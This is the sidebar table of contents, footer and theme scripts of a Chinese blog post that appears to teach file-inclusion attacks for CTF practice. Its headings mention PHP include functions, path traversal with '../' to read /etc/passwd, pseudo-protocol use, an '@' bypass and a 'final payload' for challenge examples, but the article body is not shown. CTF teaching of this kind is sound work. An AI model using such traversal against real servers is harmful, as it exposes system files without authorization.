class="toc-text">源码：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#1-%E4%BC%AA%E5%8D%8F%E8%AE%AE%E5%88%A9%E7%94%A8%EF%BC%9A"><span class="toc-number">2.1.1.2.</span> <span class="toc-text">1.伪协议利用：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-%E7%BB%95%E8%BF%87"><span class="toc-number">2.1.1.3.</span> <span class="toc-text">2.@绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%9C%80%E7%BB%88payload%EF%BC%9A"><span class="toc-number">2.1.1.4.</span> <span class="toc-text">最终payload：</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-XYctf%E7%AD%BE%E5%88%B0%EF%BC%9A"><span class="toc-number">2.2.</span> <span class="toc-text">2.XYctf签到：</span></a></li></ol></li></ol>
      
  </div>
</div>
</div>
        <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="Flight-star" class="lazyload">
  <div class="sidebar-author-name">Flight-star</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>Posts</div>
    <div class="sidebar-state-number">44</div>
  </div>
  <div class="sidebar-state-category">
    <div>Categories</div>
    <div class="sidebar-state-number">0</div>
  </div>
  <div class="sidebar-state-tag">
    <div>Tags</div>
    <div class="sidebar-state-number">11</div>
  </div>
</div>
<div class="sidebar-social">
  
</div>
<div class="sidebar-menu">
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/" aria-label="Home"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">Home</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/archives" aria-label="Archives"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">Archives</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/about" aria-label="About"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">About</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/friend" aria-label="Friend"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">Friend</div>
    </div>
  
</div>
</div>
      
      
        <div class="sidebar-btn-wrapper" style="position:static">
          <div class="sidebar-toc-btn current"></div>
          <div class="sidebar-common-btn"></div>
        </div>
      
    </div>
  </div>

  
</aside>

          
        </div>
        <footer id="footer">
  <div style="width: 100%; overflow: hidden">
    <div class="footer-line"></div>
  </div>
  <div id="footer-info">
    
    <div>
      <span class="icon-copyright"></span>
      2020-2025
      <span class="footer-info-sep"></span>
      Flight-star
    </div>
    
      <div>
        Powered by&nbsp;<a href="https://hexo.io/" rel="noopener external nofollow noreferrer" target="_blank">Hexo</a>&nbsp;
        Theme.<a href="https://github.com/D-Sketon/hexo-theme-reimu" rel="noopener external nofollow noreferrer" target="_blank">Reimu</a>
      </div>
    
    
      <div>
        <span class="icon-brush"></span>
        40.8k
        &nbsp;|&nbsp;
        <span class="icon-coffee"></span>
        03:03
      </div>
    
    
    
    
      <div>
        <span class="icon-eye"></span>
        <span id="busuanzi_container_site_pv">Number of visits&nbsp;<span id="busuanzi_value_site_pv"></span></span>
        &nbsp;|&nbsp;
        <span class="icon-user"></span>
        <span id="busuanzi_container_site_uv">Number of visitors&nbsp;<span id="busuanzi_value_site_uv"></span></span>
      </div>
    
  </div>
</footer>

        <div class="sidebar-top">
          <img src="/images/taichi.png" height="50" width="50" alt="backtop" />
          <div class="arrow-up"></div>
        </div>
        <div id="mask"></div>
      </div>
      <nav id="mobile-nav">
  <div class="sidebar-wrap">
    
      <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">Contents</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%80%8E%E4%B9%88%E6%A3%80%E9%AA%8C%E5%AD%98%E5%9C%A8%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%EF%BC%9A"><span class="toc-number">1.</span> <span class="toc-text">怎么检验存在文件包含：</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E6%89%A7%E8%A1%8C%E6%96%87%E4%BB%B6%E5%87%BD%E6%95%B0"><span class="toc-number">1.0.1.</span> <span class="toc-text">1.执行文件函数</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-include"><span class="toc-number">1.0.1.1.</span> <span class="toc-text">(1) include()</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-include-once"><span class="toc-number">1.0.1.2.</span> <span class="toc-text">(2) include_once()</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-require"><span class="toc-number">1.0.1.3.</span> <span class="toc-text">(3) require()</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4-require-once"><span class="toc-number">1.0.1.4.</span> <span class="toc-text">(4) require_once()</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E5%86%85%E5%AE%B9%E7%9A%84%E5%87%BD%E6%95%B0%EF%BC%88%E5%8F%AF%E8%83%BD%E5%AF%BC%E8%87%B4%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%EF%BC%89"><span class="toc-number">1.0.2.</span> <span class="toc-text">2. 读取文件内容的函数（可能导致敏感信息泄露）</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-file-get-contents"><span class="toc-number">1.0.2.1.</span> <span class="toc-text">(1) file_get_contents()</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-file"><span class="toc-number">1.0.2.2.</span> <span class="toc-text">(2) file()</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-readfile"><span class="toc-number">1.0.2.3.</span> <span class="toc-text">(3) readfile()</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4-highlight-file-show-source"><span class="toc-number">1.0.2.4.</span> <span class="toc-text">(4) highlight_file() &#x2F; show_source()</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B5%81%E7%A8%8B%EF%BC%9A%EF%BC%88%E4%BB%A5catctf%E7%9A%84catcat-new%E4%B8%BA%E4%BE%8B%E5%AD%90%EF%BC%89"><span class="toc-number">1.1.</span> <span class="toc-text">流程：（以catctf的catcat-new为例子）</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E6%9F%A5%E7%9C%8B%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6%E7%9A%84%E8%A1%8C%E4%B8%BA%EF%BC%9A"><span class="toc-number">1.1.1.</span> <span class="toc-text">1.查看是否存在读取文件的行为：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E5%B0%9D%E8%AF%95%E8%AF%BB%E5%8F%96-etc-passwd"><span class="toc-number">1.1.2.</span> <span class="toc-text">2.尝试读取&#x2F;etc&#x2F;passwd</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%A6%81%E5%AD%A6%E4%BC%9A%E4%BD%BF%E7%94%A8-%E2%80%A6%E2%80%A6%E2%80%A6%E2%80%A6%E2%80%A6%E2%80%A6%E6%9D%A5%E6%85%A2%E6%85%A2%E7%9A%84%E6%89%BE%E5%87%BA%E6%98%AF%E5%90%A6%E5%8F%AF%E4%BB%A5%E8%AF%BB%E5%8F%96-etc-passwd"><span class="toc-number">1.1.2.1.</span> <span class="toc-text">要学会使用..&#x2F;..&#x2F;..&#x2F;………………来慢慢的找出是否可以读取&#x2F;etc&#x2F;passwd</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E7%9F%A5%E6%99%93%E8%A6%81%E8%AF%BB%E5%8F%96%E4%BB%80%E4%B9%88%EF%BC%9A"><span class="toc-number">1.1.3.</span> <span class="toc-text">3.知晓要读取什么：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-%E7%9F%A5%E6%99%93%E7%BD%91%E7%AB%99%E6%98%AF%E7%94%B1%E4%BB%80%E4%B9%88%E7%BC%96%E5%86%99%E7%9A%84%EF%BC%9A"><span class="toc-number">1.1.4.</span> <span class="toc-text">4.知晓网站是由什么编写的：</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BE%8B%E9%A2%98%EF%BC%9A"><span class="toc-number">2.</span> <span class="toc-text">例题：</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-BaseCTF2024%E6%96%B0%E7%94%9F%E8%B5%9BAura%E9%85%B1%E7%9A%84%E7%A4%BC%E7%89%A9"><span class="toc-number">2.1.</span> <span class="toc-text">1.BaseCTF2024新生赛Aura酱的礼物</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%80%83%E5%AF%9F%E4%BB%80%E4%B9%88%EF%BC%9F"><span class="toc-number">2.1.1.</span> <span class="toc-text">考察什么？</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%BA%90%E7%A0%81%EF%BC%9A"><span class="toc-number">2.1.1.1.</span> <span class="toc-text">源码：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#1-%E4%BC%AA%E5%8D%8F%E8%AE%AE%E5%88%A9%E7%94%A8%EF%BC%9A"><span class="toc-number">2.1.1.2.</span> <span class="toc-text">1.伪协议利用：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-%E7%BB%95%E8%BF%87"><span class="toc-number">2.1.1.3.</span> <span class="toc-text">2.@绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%9C%80%E7%BB%88payload%EF%BC%9A"><span class="toc-number">2.1.1.4.</span> <span class="toc-text">最终payload：</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-XYctf%E7%AD%BE%E5%88%B0%EF%BC%9A"><span class="toc-number">2.2.</span> <span class="toc-text">2.XYctf签到：</span></a></li></ol></li></ol>
      
  </div>
</div>
</div>
      <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="Flight-star" class="lazyload">
  <div class="sidebar-author-name">Flight-star</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>Posts</div>
    <div class="sidebar-state-number">44</div>
  </div>
  <div class="sidebar-state-category">
    <div>Categories</div>
    <div class="sidebar-state-number">0</div>
  </div>
  <div class="sidebar-state-tag">
    <div>Tags</div>
    <div class="sidebar-state-number">11</div>
  </div>
</div>
<div class="sidebar-social">
  
</div>
<div class="sidebar-menu">
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/" aria-label="Home"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">Home</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/archives" aria-label="Archives"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">Archives</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/about" aria-label="About"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">About</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/friend" aria-label="Friend"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">Friend</div>
    </div>
  
</div>
</div>
    
  </div>
  
    <div class="sidebar-btn-wrapper">
      <div class="sidebar-toc-btn current"></div>
      <div class="sidebar-common-btn"></div>
    </div>
  
</nav>

    </div>
    
    
<script src="https://npm.webcache.cn/lazysizes@5.3.2/lazysizes.min.js"></script>


<script src="https://npm.webcache.cn/clipboard@2.0.11/dist/clipboard.min.js"></script>



<script src="/js/script.js"></script>



  
<script src="/js/aos.js"></script>

  <script>
    var aosInit = () => {
      AOS.init({
        duration: 1000,
        easing: "ease",
        once: true,
        offset: 50,
      });
    };
    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', aosInit);
    } else {
      aosInit();
    }
  </script>



<script src="/js/pjax_script.js" data-pjax></script>


<script type="module" data-pjax>
  import PhotoSwipeLightbox from "https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe-lightbox.esm.min.js";
  
  const pswp = () => {
    if (_$$('.article-entry a.article-gallery-item').length > 0) {
      new PhotoSwipeLightbox({
        gallery: '.article-entry',
        children: 'a.article-gallery-item',
        pswpModule: () => import("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js")
      }).init();
    }
    if(_$$('.article-gallery a.article-gallery-item').length > 0) {
      new PhotoSwipeLightbox({
        gallery: '.article-gallery',
        children: 'a.article-gallery-item',
        pswpModule: () => import("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js")
      }).init();
    }
    window.lightboxStatus = 'done';
    window.removeEventListener('lightbox:ready', pswp);
  }
  if(window.lightboxStatus === 'ready') {
    pswp()
  } else {
    window.addEventListener('lightbox:ready', pswp);
  }
</script>
















  
<script src="https://npm.webcache.cn/mouse-firework@0.0.4/dist/index.umd.js"></script>

  <script>
    window.firework && window.firework(JSON.parse('{"excludeElements":["a","button"],"particles":[{"shape":"circle","move":["emit"],"easing":"easeOutExpo","colors":["#ff5252","#ff7c7c","#ffafaf","#ffd0d0"],"number":20,"duration":[1200,1800],"shapeOptions":{"radius":[16,32],"alpha":[0.3,0.5]}},{"shape":"circle","move":["diffuse"],"easing":"easeOutExpo","colors":["#ff0000"],"number":1,"duration":[1200,1800],"shapeOptions":{"radius":20,"alpha":[0.2,0.5],"lineWidth":6}}]}'))
  </script>







  
<script src="https://npm.webcache.cn/quicklink@2.3.0/dist/quicklink.umd.js"></script>

  <script data-pjax>
    window.quicklink?.listen({
      timeout: 3000,
      priority: true,
      ignores: []
    });
  </script>


<div id="lazy-script">
  <div>
    
  </div>
</div>


  <script>
    console.log(String.raw`%c 
 ______     ______     __     __    __     __  __    
/\  == \   /\  ___\   /\ \   /\ "-./  \   /\ \/\ \   
\ \  __<   \ \  __\   \ \ \  \ \ \-./\ \  \ \ \_\ \  
 \ \_\ \_\  \ \_____\  \ \_\  \ \_\ \ \_\  \ \_____\ 
  \/_/ /_/   \/_____/   \/_/   \/_/  \/_/   \/_____/ 
                                                  
`,'color: #ff5252;')
    console.log('%c Theme.Reimu v' + '0.3.3' + ' %c https://github.com/D-Sketon/hexo-theme-reimu ', 'color: white; background: #ff5252; padding:5px 0;', 'padding:4px;border:1px solid #ff5252;')
  </script>
  



  
<script src="https://npm.webcache.cn/busuanzi@2.3.0/bsz.pure.mini.js" async></script>




<script>
  if ('serviceWorker' in navigator) {
    navigator.serviceWorker.getRegistrations().then((registrations) => {
      for (let registration of registrations) {
        registration.unregister();
      }
    });
  }
</script>

  <!-- hexo injector body_end start -->
<script src="/js/insert_highlight.js" data-pjax></script>
<!-- hexo injector body_end end --></body>
  </html>

